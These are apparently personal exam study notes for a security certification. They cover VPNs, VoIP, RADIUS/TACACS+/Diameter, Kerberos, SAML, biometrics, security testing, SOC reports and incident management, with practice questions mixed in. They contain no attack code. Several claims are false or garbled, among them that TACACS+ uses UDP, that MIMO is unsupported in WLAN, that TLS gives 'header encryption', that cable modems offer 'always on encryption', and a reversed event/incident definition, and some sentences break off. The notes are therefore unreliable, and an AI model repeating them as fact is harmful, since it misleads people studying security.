 Here are some guidelines you can use to implement communication channel security:
 50

 • Always keep voice communications encrypted.

 • Configure collaboration systems so that unwanted or unauthorized users cannot initiate or
 participate in a session.
 • When high security is required, use IPSec (both AH and ESP) as your preferred VPN type.
 • Use SSL VPNs when you need the convenience of being able to connect through a firewall
 without adding new firewall rules.
 • Use IPSec transport mode when you want to create a secure end-to-end connection
between nodes, such as a client and a server.
 • Use IPSec tunnel mode when you want to create a site to site tunnel between two
routers.
 • Use software-defined networks when you want the flexibility to immediately and
programmatically change your network connectivity and routing.
 • Choose the appropriate virtualized network type depending on your communication
channel security needs.
 • Segregate all voice traffic into its own VLAN.
 • Only use VoIP products that encrypt the call (most products nowadays have encryption
built in).
 • Design redundancy into your VoIP network, including a spare PABX, redundant links, and
redundant switching/routing.
 • If external administrative access is permitted to the PABX across the Internet, change the
default port to something random, and require strong authentication.

 Securing Collaboration Solutions

 Use the following guidelines for securing your collaboration solutions: • Spend the time
actually learning how to configure security settings on your collaboration devices and
software.
 • Always require authentication for users and devices to participate in collaboration.
 • Place collaboration systems behind a firewall that is intelligent enough to map incoming
calls to specific devices.
 • Use manufacturer recommendations to implement specific security settings.
 • Keep patches updated, especially for the collaboration software itself

 Open Mail Relay Servers:

o An SMTP service that allows inbound SMTP connections for domains it does not serve, A
Principle tool for distribution of spam/mass marketing, as they allow an attacker to
hide their identity.
 Spam:
o By far the most common way of suppressing spam is email filtering on an email
gateway, filtering based on simple key words can be first step. Most sophisticated
filters may be based upon statistical analysis or an email traffic patterns.
o SPIT - Spam over Internet Telephony
o SPIM - Spam over Instant Messenger

Datagram – Transport Layer

FTP Port 20 – Transfer Data & 21 for Command

MIMO is not supported in WLAN
Switches without VLAN can be used to increase collision domans

 Transport Layer Security (TLS) is a two-layered socket layer security protocol that contains the
TLS Record Protocol and the & Transport Layer Security (TLS) Handshake Protocol
 TLS & SSL provides header encryption over HTTP

 During a security assessment of a wireless network, Jim discovers that LEAP is in use on a
network using WPA. What recommendation should Jim make? - se an alternate protocol like
PEAP or EAP-TLS and implement WPA2 if supported.
 Ben has connected his laptop to his tablet PC using an 802.11g connection. What wireless
network mode has he used to connect these devices? – Adhoc Mode
 51

 What type of key does WEP use to encrypt wireless communications? - A predefined shared
static key
 Segmentation, sequencing, and error checking all occur at what layer of the OSI model that is
associated with SSL, TLS, and UDP? – Transport Layer
 Jim's organization uses a traditional PBX for voice communication. What is the most common
security issue that its internal communications are likely to face, and what should he
recommend to prevent it? - Eavesdropping, physical security
 Chris needs to design a firewall architecture that can support a DMZ, a database, and a private
internal network in a secure manner that separates each function. What type of design should
he use, and how many firewalls does he need? - A three-tier firewall design with at least one
firewall (Correct Answer)
 L2TP can use IPsec to provide encryption of traffic, ensuring confidentiality of the traffic
carried via an L2TP VPN. PPTP sends the initial packets of a session in plaintext, potentially
including usernames and hashed passwords. PPTP does support EAP and was designed to
encapsulate PPP packets. All VPNs are point to point, and multipoint issues are not a VPN
problem.
 Switches typically come in two designs: cut-through and store-and-forward. Cut-through
switches examine only a portion of the frame that contains the destination MAC address,
thereby increasing throughput. The term does not apply to the board design or provide Quality
of Service (QoS). Port spanning is the ability to mirror traffic from one port to the next.
 SSL is actually composed of two protocols and works closely around the transport and session
layers
 Greylisting is a method of defending email users against spam.
 You have configured a wireless device to pass WTLS traffic to a gateway before it is forwarded
to a web server. You are concerned about any shortcomings in security after traffic leaves the
gateway. How should this concern be addressed? - The Wireless Application Protocol (WAP)
gateway should implement SSL.
 An amplifier boosts noise and signal, a repeater makes a new original signal
 A branch office and its headquarters both use addresses from the RFC 1918 pools. In order to
set up an IPSec link between them, they would need to use - Tunnel mode IPSec
 When comparing cable modems to DSL service for the home user, which of the following is the
GREATEST benefit of cable modems? – Always on Encryption
 An incident is something that can be measured, and event is an incident that can cause harm
 If you found a rogue Certificate Authority (CA) among the list of CAs in your Public Key
Infrastructure (PKI) cache, your browser would: Always trust any certificate the rogue CA had
previously signed
 The process that enables two Root Certificate Authorities (CAs) to allow users within the PKI to
use trust certificates generated by the other CA is called – Cross Certification
 Which one of the following network technologies would be best suited to operate in an
errorprone environment? – X.25
 Onion routing is a technique for anonymous communication over a computer network.
 52

Domain 5

RADIUS:

 RADIUS is the appropriate protocol when simplistic username/password authentication

 RADIUS is a standard and is described in RFC 2138 and RFC 2139
 RADIUS is open protocol
 RADIUS only encrypts the user's password
 RADIUS allows companies to maintain user profiles in a central database. When a user dials
in and is properly authenticated, then a pre-configured profile is assigned to him to control
what resources he can and cannot access. The RADIUS client cannot authenticate or assign
profiles, this is the RADIUS server’s job
 Centralized access control administration is very commonly done using the Remote
Authentication Dial In User Service (RADIUS) protocol

TACAS+

 TACACS+ is really not a new generation of TACACS and XTACACS not backwards compatible
with TACACS or XTACACS
 TACACS+ encrypts all of this information between the client and the server and uses the
UDP protocol
 TACACS+ are client/server protocols
 TACACS combines its authentication and authorization processes
 XTACACS separates authentication, authorization, and accounting processes and
 TACACS+ is XTACACS with extended two-factor user authentication.
 TACACS uses fixed passwords for authentication and
 TACACS+ allows users to use dynamic (one-time) passwords, which provides more
protection

DIAMETER

 Diameter is a peer-based protocol

 Up until the conception of Diameter, IETF had individual working groups who define how
Voice over IP (VoIP), Fax over IP (FoIP), Mobile IP, and remote authentication protocols
work
 53

 It requires customers to roll out and configure several different policy servers and increases
the cost with each new added service. With Diameter all of these services can be
authenticated over the same authentication architecture.

AVP:
 AVPs are constructs that outline how communication will take place between
communicating entities. The more AVPs that are present in a protocol, the more
functionality and capabilities that protocol has. Diameter has many more AVPs than
RADIUS, which is why it can authenticate devices in many different ways and have more
functionality through its peer to peer model. (AVP – Attribute Value Pair)

Attacks:
 Password attack – Focus is on finding the password
 Dictionary attack - Using every possible password in a predefined database or list of
common or expected passwords
 Brute-Force Attacks – find all possible combinations of letters, numbers, and symbols
 Rainbow Table Attacks - a rainbow table reduces time by using large databases of pre-
computed hashes.

Smartcard Attacks (Side channel)

 Fault Analysis attacks – Adjusting the smartcards OS, such as denying power
 Power Differential attacks/power monitoring attacks – Directly connecting to pins and
attempting to translate power fluctuations
 Timing Attacks: Analyzing amount of time required to process cryptographic operations
 Emanation Attacks – Analyzing the electromagnetic filed produced by device operations

Biometric:
 2 Minutes Enrolment Time
 Throughput time – 5-10 seconds (10 Objects/Minute)
 Retina scans are the most accurate form of biometric as it scans the blood vessel behind the
eyes. Although it's not acceptable as it reveals the health condition of the person (BP, Preg-
nancy). It needs to be protected as it contains PHI details.
 The stored sample of a biometric factor is called a reference profile or a reference
template. None of the other answers is a common term used for biometric systems.
 Zephyr charts are used to gauge the effectiveness of different biometric devices
 Iris Scan is the second best and mostly accepted form of authentication
 Cross over error rate (CER): It’s the meeting point of FAR and FRR
o Type1 error: False Rejection Rate (FRR)
o Type2 error: False Accept Rate (FAR)

Kerberos:
 54

 Kerberos relies on properly synchronized time on each end of a connection to function. If

the local system time is more than five minutes out of sync, valid TGTs will be invalid and
the system won’t receive any new tickets.
 Key Distribution Centre: The KDC is the trusted 3rd Party that provides authentication
services. Kerberos uses symmetric key cryptography to authenticate clients to servers. All
clients and servers are registered with the KDC, and it maintains the secret keys for all the
members. It enables SSO service by acting a third-party Auth Server
 Authentication server: It verifies or rejects the authenticity and timeliness of tickets.
 Ticket Granting Ticket: TGT provides proof that a subject as authenticated through a KDC
and is authorized to request tickets to access other objects.
 Kerberos is not susceptible to eavesdropping
 It stores secret keys in clear text format
 Replay attack of Kerberos can be mitigated by enforcing lifetime limits for a session key
 Auth Process
o User provides authentication credentials
o Client/TGS key generated
o TGT generated
o Client/server ticket generated
o User accesses service
 Kerberos is made up of a key distribution center (KDC), a realm of principals (users,
services, applications, and devices), an authentication service, tickets, and a ticket
granting service. It provides architecture with a central server that issues tickets to allow
one principal (for instance, a user) to authenticate themselves to another (such as a
server).
 The following are some of the potential weaknesses of Kerberos:
o The KDC can be a single point of failure. If the KDC goes down, no one can access
needed resources. Redundancy is necessary for the KDC.
o The KDC must be able to handle the number of requests it receives in a timely
manner. It must be scalable.
o Secret keys are temporarily stored on the users' workstations, which means it is
possible for an intruder to obtain these cryptographic keys.
o Session keys are decrypted and reside on the users' workstations, either in a cache
or in a key table. Again, an intruder can capture these keys

SAML Vs SPML Vs XACML

 SAML: Based on XML and is used to exchange authentication & Authorization between federated
organizations.
 55

 SPML: Based on XML specifically designed for exchanging user information for federated iden-
tity single sign on purposes.
 XACML: Extensible Access Control Markup Language is used to define access control policies
within an XML format and it commonly implements RBAC.

Cards:
 Two types of contactless smart cards are available: hybrid and combi. The hybrid card has
two chips, with the capability of utilizing both the contact and contactless formats. A
combi card has one microprocessor chip that can communicate to contact or contactless
readers.
 A variation of a contact and a contactless smart card is referred to as a hybrid or combi
smart-card. The hybrid cards have a dual-chip in them, with the capability of utilizing both
the contact formats, and the contactless - antenna model. They both have an antenna to
be able to work in contactless mode. The combi smart card has the same capability, but
just one chip.

 The three authentication approaches are: Something you know something you have something
you are Strong authentication, also called two factor authentications, requires two out of these
three.
 A token device using an asynchronous token¬generating method employs a challenge/response
scheme to authenticate the user.
 A capability can be in the form of a token, ticket, or key
 Salts are random values that are added to the encryption process to add more randomness
 There are two types of synchronous-based token devices, counter-based and time based.
Counter-based means that the authentication service and the token share the same list of
access codes and secret key. The secret key is used to encrypt the access code, which is the
one-time password the user enters for authentication.
 A meta-directory gathers the necessary information from multiple sources and stores them in
one central directory. This provides a unified view of all users' digital identity information
throughout the enterprise. The meta-directory synchronizes itself with all of the identity stores
periodically to ensure the most up-to-date information is being used by all applications and IDM
components within the enterprise. A virtual directory plays the same role and can be used
instead of a meta-directory. The difference between the two is that the meta-directory
physically has the identity data in its directory, whereas a virtual directory does not and points
to where the actual data resides. When an IDM component makes a call to a virtual directory to
gather identity information on a user, the virtual directory will point to where the information
actually lives

Examples of Single Sign-On Technologies

 • Kerberos Authentication protocol that uses a KDC and tickets, and is based on
symmetric key cryptography
 • SESAME Authentication protocol that uses a PAS and PACs, and is based on
symmetric and asymmetric cryptography
 • Security domains Resources working under the same security policy and
managed by the same group
 • Thin clients Terminals that rely upon a central server for access control,
processing, and storage

 TLS provides message confidentiality and integrity, which can prevent eavesdropping. When
paired with digital signatures, which provide integrity and authentication, forged assertions can
also be defeated. SAML does not have a security mode and relies on TLS and digital signatures
to ensure security if needed. Message hashing without a signature would help prevent
modification of the message but won’t necessarily provide authentication.
 56

 Port 636 is the default port for LDAP-S, which provides LDAP over SSL or TLS, thus indicating
that the server supports encrypted connections. Since neither port 3268

 The anti-forgery state token exchanged during OAuth sessions is intended to prevent cross-site
request forgery. This makes sure that the unique session token with the authentication
response from Google’s OAuth service is available to verify that the user, not an attacker, is
making a request. XSS attacks focus on scripting and would have script tags involved, SQL
injection would have SQL code included, and XACML is the eXtensible Access Control Markup
Language, not a type of attack.

 An access control matrix is a table that lists objects, subjects, and their privileges. Access
control lists focus on objects and which subjects can access them. Capability tables list
subjects and what objects they can access. Subject/object rights management systems are not
based on an access control model.

 RADIUS supports TLS over TCP. RADIUS does not have a supported TLS mode over UDP

 Palm scans compare the vein patterns in the palm to a database to authenticate a user. Vein
patterns are unique, and this method is a better single-factor authentication method than voice
pattern recognition, hand geometry, and pulse patterns, each of which can be more difficult to
uniquely identify between individuals or can be fooled more easily.

 Web access management (WAM) is a component of most IdM products that allows for identity
management of web-based activities to be integrated and managed centrally, Control external
entities requesting access to internal objects

 Most directories follow a hierarchical database format, based on the X.500 standard (not
X.509), and a type of protocol, as in Lightweight Directory Access Protocol (LDAP), that allows
subjects and applications to interact with the directory

 Integration of SAML-SOAP-HTTP- As an example, when you log in to your company’s portal and
double-click a link (e.g., Salesforce), your company’s portal will take this request and your
authentication data and package them up in an Security Assertion Markup Language (SAML)
format and encapsulate that data into a Simple Object Access Protocol (SOAP) message. This
message would be transmitted over an HTTP connection to the Salesforce vendor site, and once
you are authenticated you can interact with the vendor software. SAML packages up
authentication data, SOAP packages up web service requests and SAML data, and the request is
transmitted over an HTTP connection.

 Non-interference concept is implemented to ensure that any actions that take place at a higher
security level do not affect or interfere with actions that take place at a lower level. So if an
entity at a higher security level performs an action, it cannot change the state

 A more intrusive smart card attack is microprobing. Microprobing uses needles and ultrasonic
vibration to remove the outer protective material on the card’s circuits. Once this is complete,
data can be accessed and manipulated by directly tapping into the card’s ROM chips.

 Access control lists are bound to objects and indicate what subjects can use them. • A
capability table is bound to a subject and lists what objects it can access.

 OpenID is an open standard and protocol that allows third-party authentication of a user. •
OAuth is an open standard that allows a user to grant authority to some web resource, like a
contacts database, to a third party. OpenID Connect is a RESTful, JSON-based authentication
protocol that, when paired with OAuth, can provide identity verification and basic profile
information
 57

 The Simple Object Access Protocol (SOAP) is a protocol specification for exchanging structured
information in the implementation of web services and networked environments

 SESAME stands for secure European system for applications in a multivendor environment, an
SSO system that supports heterogeneous environments. SESAME can be thought of as a sequel of
sorts to Kerberos, “SESAME adds to Kerberos: heterogeneity, sophisticated access control
features, scalability of public key systems, better manageability, audit and delegation.” 7 Of
those improvements, the most compelling is the addition of public key (asymmetric)
encryption. It addresses one of the biggest weaknesses in Kerberos: the plaintext storage of
symmetric keys. SESAME uses privilege attribute certificates (PACs) in place of Kerberos'
tickets.

 Content-dependent and context-dependent access controls are not full-fledged access control
methods in their own right as MAC and DAC are, but they typically play a defense-in-depth
supporting role. They may be added as an additional control, typically to DAC systems.
Content-dependent access control adds additional criteria beyond identification and
authentication; that is, the actual content the subject is attempting to access. Context-
dependent access control applies additional context before granting access. A commonly used
context is time.

 Syskey is Microsoft utility used to encrypt the Database that holds all of the systems or network
password
 Kerberose is open auth protocol
 SAM & SysKey – The SAM contains all the hashed version of user’s password and Syskey encrypts
entire SAM Database

 Purchase a Diameter for centralized access control and SESAME for SSO
 Which of the following is the most accurate biometric system?  A. A CER of 1
 Which of the following provides an upgrade path from RADIUS?  A. Diameter
 SATAN is an example of a vulnerability scanner
 Software faults can be uncovered with watchdog timers.  True
 TACACS + supports two-factor authentication.  True
 Tokens are an example of type II authentication
 Keyboard dynamics is an example of type III authentication

Types of Phishing Attacks

 Spear Phishing – Targeted to specific group of users

 Whaling – Targeted to Senior Executives
 Vishing – It uses Phone or VoIP (Credit Card hacking using phone)
 Vishing & SPAT – A caller ID Spoofing Attack (SPAT – Spam Over Internet Telephony)

Threat Modelling – It refers to the process of identifying, understanding and categorizing potential
threats
Approaches:
o Focused on Assets
o Focused on Attackers
o Focused on Software

OpenID= Decentralized Authentication +Redirection

OAuth 2.0 – RFC 6749 – Authorization Framework + Delegated Access + Third Party App
OpenID Connect – JSON Web Tokens + REST Web Service

 WS-SecureConversation Web Service – Create Security context for faster message exchanges

Types of Hard Tokens:

 58

 Look Up Secret Token – Credit/Debit Card Grid

 Out of Band Token – Sends Over the Network
 Synchronous OTP – RSA
 Asynchronous OTP – Auth requires user activation Data PIN and enter the value

Types of Federated Identities

 Cross Certification – Web of Trust

 Trusted Third-Party Model
 SAML

 Access Control – Implementation, Monitoring, Modifying, Testing & Terminating

 Authentication methods:
o Something you know, Something you are ,Something you have. Without authentication,
auditing ( accountability) will not be effective.
- Identification provides uniqueness
- Authentication provides validity of the identity
- Authorization provides control over access levels

 Elements of systems that use RFID (PIV is used to prevent cloning of RFID – Personal Identity
Verification)
 RFID tag ( Transponder)
 RFID tag reader ( Transceiver)
 A back-end database ( Tag content)

 Script-Based Single Sign-on ( when there is no SSO solution)

o - These scripts manipulate the applications
o - Interacting with them as if they were the user
o - Entering user ID, password, and other authentication information as needed
o - The scripts manage all the login and authentication interaction with the application
on behalf of the user.

 Two types of Tokens - Hardware & Software token

o Soft Token implementation
 Stored on a general-purpose computer
 Require activation through a second factor
 Compared to hard tokens:
 Generally cheaper to implement
 Easier to manage than hard tokens
 Avoid some physical security risks

o Hard Token implementation

 - Non-software physical tokens that store credentials on hardened dedicated
devices used to authenticate an identity
 - Susceptible to physical security attacks, such as direct physical access, if lost
or stolen.
 Types of hard Tokens
 Look up secret Token - Credit/Debit card Grid secret
 Out of Band token - Sends over the network
 Synchronous OTP - RSA is best example, generates 6 digit value,
Internal mathematical calculation,
 Asynchronous OTP - Authentication requires user activation data PIN
and enter the value.
 Strong authentication is also sometimes referred to as multifactor authentication (MFA), which
just means that more than one authentication method is used. While two-factor authentication
 59

(2FA) is common, three-factor authentication (for example, smart card, PIN, and retinal scan)
is sometimes used.
 Lower the CER more accurate the system is

 Federated Identity: (Identity Provider & Relying Party)

o Federated identity systems allow trust access and verification across multiple
organizations.
o Relying party consumes security assertions from ID provider and determined to give
access
o - A Federated identity is a portable identity, and its associated entitlements, that can
be used across business entitlements; It allows a user to be authenticated across
multiple IT systems and enterprises.
o - SAML, Oauth, OPENID
o
 SSO with Multiple Domains - without synchronization of identities.
o Three types of Federated Identities
 - Cross Certification
 - Trusted Third-Party Model
 - Security Assertion Markup Language ( SAML)
o In Cross Certification and Trusted Third-Party model we rely on the API to integrate the
multi domains.

 SAML -> Share authentication data to applications.

 XACML -> Web services and applications interpret security policies and access permissions
 SPML -> Sharing user information to the applications not compatible LDAP

 These three SAML roles include the following:

o ■■ Identity provider (IdP): This is the first entity. It makes an assertion about another
identity, based on information it has. This information might have just been obtained,
say by querying the user for a username/password pair.
o ■■ Service provider (SP): This entity is the relying party that is being asked to provide
its service or resource, based on the assurance provided by the IdP.
o ■■ Subject or principal: This entity is the subject of the assertion, usually a person, who
is in some sense being vouched for.

 The four primary components of SAML are:

o Assertions: The assertion may also specify, in an authorization Decision statement,
conditions under which the principal is permitted to perform Certain actions on a given
resource.
o Protocols: SAML protocols describe how information is to be exchanged Between, or
consumed by, SAML entities
o Bindings: SAML bindings specify how to encapsulate the various SAML protocols in
various types of messages. Since SAML 2.0, these bindings have described not only how
to include queries in, for example, SOAP envelopes, but also HTTP POST and GET
exchanges (among other)
o Profiles: SAML bindings, protocols, and assertions can be pulled together to make a
profile, a set of definitions and instructions for a specified use case.

 Cloud based IDM Solution - Identity as a service ( IDAAS) in cloud this is also called as CASB -
Cloud Access security broker.

Access Controls:
 60

o Compared to other access control paradigms, RBAC can reduce employee downtime and
simplify account provisioning.
o Mac is mainly used in Army, primary objective is Confidentiality - Orange book.
o TBAC is also called as Active Model

 Visibility must be considered when designing effective security control for highly sensitive data
and applications.

 PAM – Privileged Access Management – It is a solution that helps Organizations restrict

privileged access within an existing Directory Environment
 61

Domain 6

 NMAP Port Status

Open: Port is open and application is actively accepting connections

Closed: Port is accessible; no application is accepting connection on that port
Filtered: Unable to determine if port is open or closed

 Penetration Methodologies employed by Ethical Hacker: - REVER

 Reconnaissance: Collection of information about Organization (Dumpster Diving)

 Enumeration: Use of intrusion method i.e. Scanning, Sniffing and Spoofing
 Vulnerability Analysis: Uncover potential weakness
 Execution: Exploit the vulnerabilities
 Reporting: Documenting the findings (Not performed by Attacker)

 Code Review -POPIRF

Fagan Inspection: Highly restrictive environment where code flaw would be catastrophic
P – Planning
O – Overview
P – Preparation
I – Inspection
R – Rework
F – Follow up
(POPIRF)

 Code Testing
1. STATIC TESTING: source code analysis
2. DYNAMIC TESTING: testing done on runtime . SQL injection & CSRF are identified
3. FUZZ TESTING: Different types of inputs are sent to application to test the behavior,
stress testing
i. Mutation (Dumb) Fuzzing – Previous input values are mutated (changed) and
passed to the application
ii. General (Intelligent) Fuzzing – Develops data model & creates new input.
 62

 The common development process of creating a security policy includes initial and evaluation,
development, approval, publication, implementation, and maintenance.

 Fuzzing (also called fuzz testing) is a type of black-box testing that submits random, malformed
data as inputs into software programs to determine if they will crash. A program that crashes
when receiving malformed or unexpected input is likely to suffer from a boundary-checking
issue and may be vulnerable to a buffer overflow attack.

 Combinatorial software testing is a black-box testing method that seeks to identify and test all
unique combinations of software inputs. An example of combinatorial software testing is
pairwise testing, also called all-pairs testing.

 What is the difference between a test and an assessment? -B. A test is an examination of the
properties or behaviours of a particular system compared to a baseline established by the
enterprise to satisfy the approved security posture for the system or device. An assessment is a
series of such tests across a deployment of related devices or systems, performed to determine
the general security posture of an entire functional area.

 Vulnerability testing does not normally include scanning hosts for malware. Instead, it focuses
on finding flaws that malware could potentially exploit.

Audit:

o A second-party audit is typically tied to the terms of a contract between business

entities, while a third-party audit is usually used to determine if an entity is
compliant with applicable government regulations.

o The most important practice when conducting internal audits is to ensure both that
the results are actionable by operations staff and that their importance is well
understood by the management team that is responsible for actions being taken.
Otherwise, such audit activities present negative value, introducing liability for the
organization by demonstrating institutional knowledge of weaknesses which then go
unaddressed.

o While it is certainly the case that preliminary findings may be inaccurate, and
hence cause some amount of unnecessary alarm if viewed without proper context,
management must be kept apprised of the auditors’ activities and discoveries at all
times. Management still bears the responsibility of operating the business, which
includes responding to adverse conditions, even as the audit effort is on-going.

o Internal audits benefit from the auditors’ familiarity with the systems, but may be
hindered by a lack of exposure to how others attack and defend systems.

o External audits typically bring a much broader background of experience that can
provide fresh insights, but can be expensive.

 Service Organization Controls (SOC) are auditing standards for service organizations.

 SOC 1 pertains to financial controls.

 SOC 1 Type 1: A design of controls report. This option evaluates and reports on
the design of controls put into operation as of a point in time.
 SOC 1 Type 2: Includes the design and testing of controls to report on the
Operational effectiveness of controls over a period of time (typically six
months).
 SOC 2 is a very detailed report that pertains to trust services (Security, Availability,
Confidentiality, Process Integrity, and Privacy) and is intended for management and
regulators.
 63

 SOC 2 Type 1: only requires the organization’s own attestation..

 SOC 2 Type 2: includes an auditor’s opinion on the operational effectiveness of
the controls
 SOC 3 also pertains to trust services (Security, Availability, Confidentiality, Process
Integrity, and Privacy), but is a less detailed report that is intended for publication for
the general public.

 APT - An advanced persistent threat (APT) is a prolonged and targeted cyber attack in which
an intruder gains access to a network and remains undetected for an extended period of time.
The intention of an APT attack is usually to monitor network activity and steal data rather than
to cause damage to the network or organization. APT attacks typically target organizations in
sectors such as national defense, manufacturing and the financial industry, as those companies
deal with high-value information, including intellectual property, military plans, and other data
from governments and enterprise organizations.

 Statement coverage tests verify that every line of code was executed during the test. Branch
coverage verifes that every if statement was executed under all if and else conditions.
Condition coverage verifes that every logical test in the code was executed under all sets of
inputs. Function coverage verifes that every function in the code was called and returns results

 Bluetooth active scans can determine both the strength of the PIN and what security mode the
device is operating in. Unfortunately, Bluetooth scans can be challenging due to the limited
range of Bluetooth and the prevalence of personally owned Bluetooth enabled devices. Passive
Bluetooth scanning only detects active connections and typically requires multiple visits to have
a chance of identifying all devices.

 Discovery can include both active and passive discovery. Port scanning is commonly done during
discovery to assess what services the target provides, and nmap is one of the most popular tools
used for this purpose. Nessus and Nikto might be used during the vulnerability scanning phase,
and john, a password cracker, can be used to recover passwords during the exploitation phase.

 B. The Common Platform Enumeration (CPE) component of SCAP provides a consistent way to
refer to operating systems and other system components. The Common Vulnerabilities and
Exposures (CVE) component provides a consistent way to refer to security vulnerabilities. The
Common Weaknesses Enumeration (CWE) component helps describe the root causes of software
flaws. The Open Vulnerability and Assessment Language (OVAL) standardize steps of the
vulnerability assessment process

 CVSS – Base Score – Temporal Score – Environmental Score

 Nikto, Burp Suite, and Wapiti are all web application vulnerability scanners, tools designed
specifically to scan web servers and applications.

 Once a vulnerability scanner identifies a potential problem, validation is necessary to verify

that the issue exists.
 64

 Assessment is systematic process of Test

 Good tester will maintain all documents test report will comply with test plan

 ISCM – Information System Continuity Monitor

 TCA – Test Coverage Analysis –

 Compliance Testing – SSAE 16 & 18, SOC1, SOC2, SOC3 & ICOFR – Internal Control of Financial
Reporting

 SOC1 – Finance – Type 1 – Design of Control, Type 2 – Effectiveness of Control

 SOC2 – IT Support (Control) – Type 1 – Design of Control, Type 2 – Effectiveness of Control

 SOC3 - Publically Available

 Verification - met the documented requirements agreed, look for consistency, completeness
and correctness of the software and its supporting documents.
 Validation - met the user objectives UAT Team Testing

 Internal assessment: A security assessment conducted by internal organizational personnel, Due

care.
 External Assessment: A security assessment performed by external or third party personnel.
Due Diligence. Provides more independence.

 Security Testing - VAPT

 Security Assessment - Comprehensive study
 Security Audit - check meeting compliance or not

 SCAP The Security Content Automation Protocol (SCAP) is a method for using specific standards
to enable automated vulnerability management, measurement, and policy compliance
evaluation of systems deployed in an organization, including e.g., FISMA compliance.

 Describing Vulnerabilities:
o Common Vulnerabilities and Exposures ( CVE) :- Provides a naming system for describing
security vulnerabilities. Used by the tools to verify the signature and vulnerability. Ex:
http://cve.mitre.org/ - Refer to the website
o Common Vulnerability Scoring System ( CVSS) :- Provides a standardized scoring system
for describing the severity of security vulnerabilities.
o Common Configuration Enumeration (CCE) :- Provides a naming system for system
configuration issues. It’s not vulnerability, but because of the configuration issues could
result in vulnerability.
o Application Security Verification Standard ( ASVS) - As per OWASP vulnerability. The
Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit
charitable organization focused on improving the security of software. ASVS has four
levels, the application is assessed based on the level. Testable in the exam the
different levels.
 ASVS Level 1 (opportunistic) is meant for all software.
 ASVS Level 2 (standard) is for applications that contain sensitive data, which
requires protection.
 ASVS Level 3 (advanced) is for the most critical applications - applications that
perform high value transactions, contain sensitive medical data, or any
application that requires the highest level of trust.
 65

 Real User Monitoring is variant of Passive Monitoring

 Synthetic Monitoring is variant of Active Monitoring

 Dynamic vs static
o Static testing is more cost-effective than dynamic testing. ... Static testing is done in
verification stage whereas dynamic testing is done in validation stage. In static testing
code is being examined without being executed whereas In dynamic testing, code is
being executed and tested without necessarily being examined.
 Manual vs automated
o In manual testing, test cases are executed by a human tester and software. Automated
testing is significantly faster than a manual approach. Manual testing is time-consuming
and takes up human resources. ... ROI is lower compared to Automation testing in the
long run

 Test Coverage Analysis Test coverage analysis refers to identifying how the testing performed
relates to the total functionality of the application

o Branch coverage ensures that each branch in a control statement has been executed.
o Condition coverage requires each Boolean expression to be validated for both true and
false conditions.
o Function coverage makes sure that every function in the program is called.
o Statement coverage validates the execution of every statement in the program.

 An Organization should employ various methods to determine access control effectiveness

o Vulnerability Assessment - Identity vulnerabilities
o Penetration Testing - exploit vulnerabilities
o Application Security Testing

 Risk Management
o Compliance Driven – Per mandates, At agreed upon intervals
o Data Driven – Support Risk response Decisions, Security status information, Insight into
controls effectiveness

 Information security continuous monitoring (ISCM) is a holistic strategy to improve and address
security. ISCM will help ensure that security controls are effective and that the organization’s
risk exposure is within acceptable limits.
o There are several steps to implementing ISCM as outlined in NIST SP800-137.
 • Define an ISCM strategy based on risk tolerance that maintains clear visibility
into assets, awareness of vulnerabilities, up-to-date threat information, and
mission/business impacts.
 • Establish an ISCM program determining metrics, status monitoring
frequencies, control assessment frequencies, and an ISCM technical
architecture.
 • Implement an ISCM program and collect the security-related information
required for metrics, assessments, and reporting. Automate collection,
analysis, and reporting of data where possible.
 • Analyze the data collected and Report findings, determining the appropriate
response. It may be necessary to collect additional information to clarify or
supplement existing monitoring data.
 • Respond to findings with technical, management, and operational mitigating
activities or acceptance, transference/sharing, or avoidance/rejection.
 • Review and Update the monitoring program, adjusting the ISCM strategy and
maturing measurement capabilities to increase visibility into assets and
awareness of vulnerabilities, further enable data-driven control of the security
of an organization’s information infrastructure, and increase organizational
resilience.

 Fuzzing (also called fuzz testing) is a type of black-box testing that submits random, malformed
data as inputs into software programs to determine if they will crash. A program that crashes
 66

when receiving malformed or unexpected input is likely to suffer from a boundary-checking

issue and may be vulnerable to a buffer overflow attack.

 Combinatorial software testing is a black-box testing method that seeks to identify and test all
unique combinations of software inputs. An example of combinatorial software testing is
pairwise testing, also called all-pairs testing.

SOC Report Types:

 SOC 1 → IOFR Internal Control of Financial Reporting ( auditing the financial statements),
Organizations wishing to invest another organizations requests SOC1 reports to understand
the financial status.
 SOC 2 → Information Security IT/Technology - audits the IT Controls
 SOC 3 → Seal of Approval ( SOA) - share it publicically, SOC1 and SOC2 can’t be shared
publicly.
 Each SOC1/SOC2 reports has further two types Type 1 ( design of control) and Type2 (
effectiveness of the implementation of the control in last 6 months)
 67

Domain 7

 Permission: Am I allowed to access the object? (Accessing file)

 Rights: What actions I can take on these objects? (Changing system time)
 Privilege: Permission + Rights

 SLA: Financial stipulation is involved

 MOU: No financial stipulation is involved. (Same as SLA)

 Change Management Process - RRASD

1. Request Change: Request is made by the team who would like to make changes in the system
2. Review the change: Requirement is reviewed by the designated person.
3. Approve/Reject: Based on the review, the change will be approved/rejected
4. Schedule for implementation: Mainly on off hours (weekends)
5. Document: All the findings should be documented. Versioning of document is also important.

 Release Management Process - ETADV

1. Evaluate --> Release Patches

2. Test--> Test on isolated systems
3. Approve--> Use of change management to approve
4. Deploy--> Deployment of patches on affected systems.
5. Verify--> Verify if patches are deployed.

 Logs Vs Application Mapping

o Database Object Access – Application Logs
o Website Access – Proxy Logs
o File Access – Security Logs
o Network Traffic – Firewall Logs
o System Event – To audit file deletion
o Service Modification – System Logs
o Sharing illegal copies of software tracking – Network Event Logs

 Incident Management Process - DRMRRRL

Detect: Not every incident needs to be reported or escalated (Identify FPs)
Response: Respond to the true incident immediately and effectively
Mitigate: Ensure no further damage is caused. (Contain)
 68

Report: It should be reported to the senior management and concerned people. (Only desig-
nated person should be allowed to speak with media)
Recover: Build the system at least as secure as it was prior to the incident
Remediate: Identify the root cause of the incident.
Lesson Learned: What can be improved from the past experience?

 Smurf and Fraggle Attack: Attacker pings with spoofed source address of victim. Smurf: ICMP
packets & Fraggle: UDP packets – SI & FU
 Sabotage: Destruction caused by inside people - SI
 Espionage: Spying - ES
 Intrusion Detection and Prevention Systems:
 Effective method to detect DoS attacks.
 Primary purpose is timely and accurate response.
o Types:
o a. Knowledge Based (Signature/Pattern): Detects what signatures are updated.
o b. Anomaly (Behavioral/Statistical/Heuristic): IDS is kept in an environment to learn.
(Best for Zero day attacks)

 Darknets: Networks present with no sensitive content. They help in capturing attacks.
